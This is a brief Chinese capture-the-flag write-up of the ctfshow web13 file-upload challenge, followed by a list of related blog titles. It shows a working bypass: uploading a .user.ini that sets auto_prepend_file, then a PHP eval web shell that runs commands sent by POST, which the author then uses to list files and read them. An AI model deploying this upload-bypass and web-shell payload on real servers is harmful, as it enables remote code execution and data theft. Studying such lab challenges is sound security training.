ctfshow-web13 文件上传

0x00 前言

0x01 题目

0x02 Write Up

首先看到是一个上传页面,测试其他无果,遂进行目录遍历,发现upload.php.bak文件

可以看到这里的限制条件,大小,以及内容,这里可以使用.user.ini进行上传,具体参考:php user.ini详解

那么我们先上传.user.ini

cpp 复制代码
auto_prepend_file=1.txt

然后上传1.txt,尝试使用get,但是没有生效,这里需要控制字符数量

cpp 复制代码
<?php eval($_POST['a']);

上传好了之后,通过index.php进行访问

首先查看当前目录

然后通过highlight_file读取文件

以上

相关推荐
ba_pi8 小时前
每天写点什么2026-02-04(2.1)信息安全
安全·web安全
菩提小狗9 小时前
小迪安全2023-2024|第5天:基础入门-反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载_笔记|web安全|渗透测试|
笔记·安全·web安全
迎仔16 小时前
11-云网络与混合云运维:弹性数字世界的交通管理
网络·安全·web安全
pitch_dark16 小时前
渗透测试系统基础篇——kali系统
网络·安全·web安全
独行soc16 小时前
2026年渗透测试面试题总结-20(题目+回答)
android·网络·安全·web安全·渗透测试·安全狮
黑客老李1 天前
web渗透实战 | js.map文件泄露导致的通杀漏洞
安全·web安全·小程序·黑客入门·渗透测试实战
liann1192 天前
3.1_网络——基础
网络·安全·web安全·http·网络安全
独行soc2 天前
2026年渗透测试面试题总结-17(题目+回答)
android·网络·安全·web安全·渗透测试·安全狮
独行soc2 天前
2026年渗透测试面试题总结-18(题目+回答)
android·网络·安全·web安全·渗透测试·安全狮
旺仔Sec2 天前
一文带你看懂免费开源 WAF 天花板!雷池 (SafeLine) 部署与实战全解析
web安全·网络安全·开源·waf